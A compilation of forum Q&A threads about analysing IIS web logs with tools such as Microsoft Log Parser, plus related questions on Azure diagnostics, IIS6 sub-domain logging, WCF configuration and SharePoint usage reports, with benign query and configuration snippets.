I'm looking for some kind of tool that will let me slice and dice IIS web logs, for troubleshooting purposes...
All the tools I've found are designed to analyze logs for a "Google Analytics" type of output, but what I want is more like "see all hits made from some IP" or "see all hits to a specific ASHX file" - things like that, to troubleshoot a few obscure bugs we are having with sessions...
Does anyone know of such a tool, or should I just roll my own?
Thanks!
Use Log Parser. It is a free tool from Microsoft that analyzes all kinds of logs, including IIS logs.
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
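With Log Parser you write SQL-like queries directly against the raw log files, which is exactly the "slice and dice" you describe. A couple of sketches (the IP address, handler name, and log file pattern are placeholders for your own values):

    rem All hits from a given IP address
    logparser "SELECT date, time, cs-uri-stem, sc-status FROM ex*.log WHERE c-ip = '203.0.113.5'" -i:IISW3C

    rem All hits to a specific ASHX handler, grouped by client IP
    logparser "SELECT c-ip, COUNT(*) AS Hits FROM ex*.log WHERE cs-uri-stem LIKE '%/handler.ashx' GROUP BY c-ip ORDER BY Hits DESC" -i:IISW3C

Run it from the folder containing the logs, or put the full path in the FROM clause.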
Here is another great link.
http://www.msexchange.org/tutorials/Using-Logparser-Utility-Analyze-ExchangeIIS-Logs.html
Our group at work is suggesting logdog. Open source, free, etc. I don't have direct experience with it yet, but my understanding is that it operates very efficiently on different logs (syslogd, access.log, error.log). You configure which logs to watch, how much, how often, and what to look for. It can then be configured to send out alerts.
Splunk is more heavyweight, but it's free (if your logs aren't huge). And it's cute.
And there are always plain find, findstr, grep, and the like.
Note: there are a few similar questions already asked here, but they are from 2009. Maybe something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question: what is the best tool to view issues with a website based on IIS logs (e.g. 404 and 500 responses, long page-processing times, etc.)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this; I just want to periodically check that all is good with the website.
Second question (and I know I'm most likely asking for too much): is there any way to expose the processed logs to the web? So I can review the things mentioned above without RDPing into the server?
Ideally I'm looking for a free/open-source solution, but I'm ready to pay for good software as well (just not a lot of $$).
Thank you.
You can take a look at our log-monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates set up for IIS, and we can consolidate the logs in a database with web access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also set up real-time alerts, so that you can get an email when a critical error, like a 500 error, is encountered in a log file.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug in command-line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can set up comprehensive monitoring with a single product.
I'd look into @LuckyLuke's solution (or similar) - the classic "build vs. buy" decision. Based on your post, this isn't going to be your full-time job, so IMHO it's best to leave it to those who do...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own Log Parser and, depending on how far you want to go with it, use its COM dll to write your "admin web pages" in .NET/ASP.NET and host them on each of your servers....
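As a rough sketch of that COM route (the MSUtil names below are what the interop generated on my machine from Logparser.dll; the query and log path are placeholders):

    // Add a COM reference to the LogParser ("MS Utility") component;
    // Logparser.dll must be registered on the server. Visual Studio then
    // generates the MSUtil interop assembly used below.
    using MSUtil;

    class ErrorReport
    {
        static void Main()
        {
            LogQueryClass query = new LogQueryClass();
            COMIISW3CInputContextClass iisW3C = new COMIISW3CInputContextClass();

            // Placeholder path -- point this at your site's log folder.
            ILogRecordset rs = query.Execute(
                "SELECT TOP 50 date, time, cs-uri-stem, sc-status " +
                "FROM C:\\Logs\\W3SVC1\\ex*.log WHERE sc-status >= 500",
                iisW3C);

            // Walk the recordset and print each error hit.
            for (; !rs.atEnd(); rs.moveNext())
            {
                ILogRecord rec = rs.getRecord();
                System.Console.WriteLine("{0} {1} -> {2}",
                    rec.getValue("date"), rec.getValue("cs-uri-stem"),
                    rec.getValue("sc-status"));
            }
            rs.close();
        }
    }

The same recordset loop drops straight into an ASP.NET page if you want the report in a browser instead of a console.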
If you only want to be alerted about a few specific errors, another "hacky" way would be to provide your own custom error pages (either replacing the default IIS error pages, or configuring your ASP.NET apps to use specific error pages).
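On the ASP.NET side that is just the customErrors element in web.config; the page names here are placeholders:

    <!-- web.config: route specific HTTP errors to your own pages -->
    <system.web>
      <customErrors mode="On" defaultRedirect="~/Error.aspx">
        <error statusCode="404" redirect="~/NotFound.aspx" />
        <error statusCode="500" redirect="~/ServerError.aspx" />
      </customErrors>
    </system.web>

Your custom pages can then log or email whatever details you care about.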
I've been working on a web application and finally published it to Azure. The application is not critical and currently I use only one role to keep costs down.
I would like to start trying to get a feel for who (if anyone) is using my site. Can anyone give me some suggestions on how I could do this? What I would really like is to avoid anything like the Google scripts that I see some websites use for monitoring page hits; I would like to do as much as possible on the server.
Any advice on where to start and what to look at would be much appreciated.
Katarina
Aside from things like Google Analytics and StatCounter, you'd want to set up some performance counters that you can watch externally. This requires you to use the Diagnostic Monitor:
Set up which performance counters to track, and how often to poll for values
Set up how frequently to upload the collected values to Table Storage
Diagnostic data is aggregated from all your instances, so then you can run queries against the diagnostic tables. Cerebrata has a page that details these table names (you can also use their Diagnostics Manager tool, other 3rd-party tools, or roll your own).
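For illustration, wiring that up in your role's OnStart looks something like this - a sketch against the Microsoft.WindowsAzure.Diagnostics API, where the counter, the intervals, and the connection-string setting name (the Diagnostics plugin default) are assumptions to adjust:

    using System;
    using Microsoft.WindowsAzure.Diagnostics;
    using Microsoft.WindowsAzure.ServiceRuntime;

    public class WebRole : RoleEntryPoint
    {
        public override bool OnStart()
        {
            DiagnosticMonitorConfiguration config =
                DiagnosticMonitor.GetDefaultInitialConfiguration();

            // Example counter: overall CPU, sampled every 30 seconds.
            config.PerformanceCounters.DataSources.Add(
                new PerformanceCounterConfiguration
                {
                    CounterSpecifier = @"\Processor(_Total)\% Processor Time",
                    SampleRate = TimeSpan.FromSeconds(30)
                });

            // Push collected samples to Table Storage every 5 minutes;
            // they land in the WADPerformanceCountersTable table.
            config.PerformanceCounters.ScheduledTransferPeriod =
                TimeSpan.FromMinutes(5);

            DiagnosticMonitor.Start(
                "Microsoft.WindowsAzure.Plugins.Diagnostics.ConnectionString",
                config);

            return base.OnStart();
        }
    }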
Igork posted this StackOverflow answer as well, which references some blog posts by Azure MVP Neil Mackenzie.
To add to Dave's answer, there are three levels of monitoring you can do:
If you want to know who is using your site, Google Analytics is best, and free... There are a few others, but all involve injecting a small piece of JavaScript into your pages.
If you want to know the load your site is under, inspecting performance counters via Cerebrata's tool is likely best: http://www.cerebrata.com
If you want to go one step further and be notified when the load on your site is outside your predefined conditions (active monitoring), or have your website automatically scale up when the load is too high, AzureWatch is probably the best option: http://www.paraleap.com
HTH
I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid Google Analytics is not an option due to the setup; I just need access (I'm guessing) to the file-request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties so that it collects them all? I'm writing my own log-parsing software, as I need specific things; I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out Microsoft's Log Parser tool. That should at least take care of the more onerous part of the task (actually making sense of the log files). From there it is a pretty straightforward reporting operation.
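If the sub-domains share one IIS site via host headers, first make sure the Host (cs-host) field is being logged (in IIS Manager: web site properties -> Web Site tab -> logging Properties -> Advanced). Every request then records which host name it was addressed to, and you can split the traffic back out with a query like this (the host name is a placeholder):

    rem Hits per URL for one sub-domain, out of a shared site's logs
    logparser "SELECT cs-uri-stem, COUNT(*) AS Hits FROM ex*.log WHERE cs-host = 'sub.example.com' GROUP BY cs-uri-stem ORDER BY Hits DESC" -i:IISW3C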
Are there any tools that go beyond requiring deep and intimate knowledge of every configuration option and nuance, and will just set up an application with a minimum of inputs? Something like a wizard that produces the XML configuration based on those simple inputs. I don't care about security; I just need the service to work. Ideally the tool would be able to set up IIS6 as well, or at least, given a set of options, produce a list of the steps I need to complete in IIS.
The Microsoft Service Configuration Editor is no better than editing the XML directly. I did find a website that has the right idea, but it wasn't able to handle my simple installation (http://www.noemax.com/support/wcf_binding_configuration_wizard.html).
Is there anything out there that puts some convention into play over this mountain of configuration?
WCF configuration can look very daunting at first, indeed! I like that configuration wizard you linked to - why wasn't it good enough for you?
I don't know of any tool right now that would solve your problem and help you figure out the proper configuration - it really boils down to learning the ropes and getting to know the ins and outs of it, I'm afraid.
Basically, what I've learned is : don't even start to imagine all the things you could do - try to focus on what you should do (and what you need).
Really, it boils down to about five scenarios, as outlined in the excellent book "Programming WCF Services" by Juval Lowy:
intranet apps (use the NetTcp binding, Windows security)
internet apps (use the wsHttp binding if ever possible, username/pwd or certificates for security)
business-to-business apps (use whatever binding makes sense, secure by certificates)
queue message delivery (MSMQ)
no-security apps (legacy ASMX support, interop with "dumb" webservice clients)
Basically, pick the one you need, and from there you're pretty much set as to what to do and how to do it. I would definitely recommend checking out Juval's book - an excellent, excellent resource!
So the question is: which category does your app fit in? Based on that, you can pretty much determine all that's needed from there.
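For instance, if yours is the "internet app" scenario, the configuration really only needs a service with a single wsHttpBinding endpoint - something like this sketch, where the service name, contract, and address are placeholders:

    <!-- web.config / app.config: minimal internet-facing WCF service -->
    <system.serviceModel>
      <services>
        <service name="MyCompany.OrderService">
          <endpoint address="http://localhost:8000/OrderService"
                    binding="wsHttpBinding"
                    contract="MyCompany.IOrderService" />
        </service>
      </services>
    </system.serviceModel>

Everything you leave out falls back to the binding's defaults, which is usually what you want.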
Also, I watched two screencasts that really helped me get over the heaps of configuration options in WCF, and focus on what's really important:
Extreme WCF with Miguel Castro
Demystifying WCF with Keith Elder
Both gave me a good feel for what configuration is really needed - and what is just fluff.
Hope that helps some!
Marc
I have been looking at the "_layouts/SpUsageSite.aspx" logs for my site, but they are giving erroneous results (e.g. 0 unique visitors when I know that at least I have been on the site).
Is there a better way to view these logs than the out-of-the-box functionality?
Did you enable the usage processing and the usage logging for the site in question?
You can enable them in your Central Administration under:
Operations -> Usage analysis processing
It may also be that the processing is limited to a specific timespan.
I have come across a bug in the usage analysis processing, to do with UTC date conversion, which resulted in the processed numbers being erroneous. This is apparently fixed in SP2, but we have not been able to apply it quite yet.
The alternative is a bit onerous, as you need to copy the usage logs from each front-end server to a single location and configure Log Parser to store the information in a database.
Serge van den Oever steps through this quite well here.
I don't really recommend this as a regular process as it takes a lot of effort, but it does give you a huge amount of information for when you wish to take a detailed look at usage on a particular point of your SharePoint farm.
Ideally we would have a solution to parse the logs automagically using the log parser utility and provide that information in SSRS reports.
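Log Parser can at least cover the "into a database" half of that out of the box with its SQL output format - for example, against plain IIS logs (server and database names are placeholders; the usage-log format itself still needs the conversion step Serge describes):

    rem Bulk-load IIS logs into a SQL Server table, ready for SSRS reports
    logparser "SELECT * INTO IisLog FROM ex*.log" -i:IISW3C -o:SQL -server:MYSERVER -database:LogDb -createTable:ON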
We patched to SP2 and it all started working again, like magic.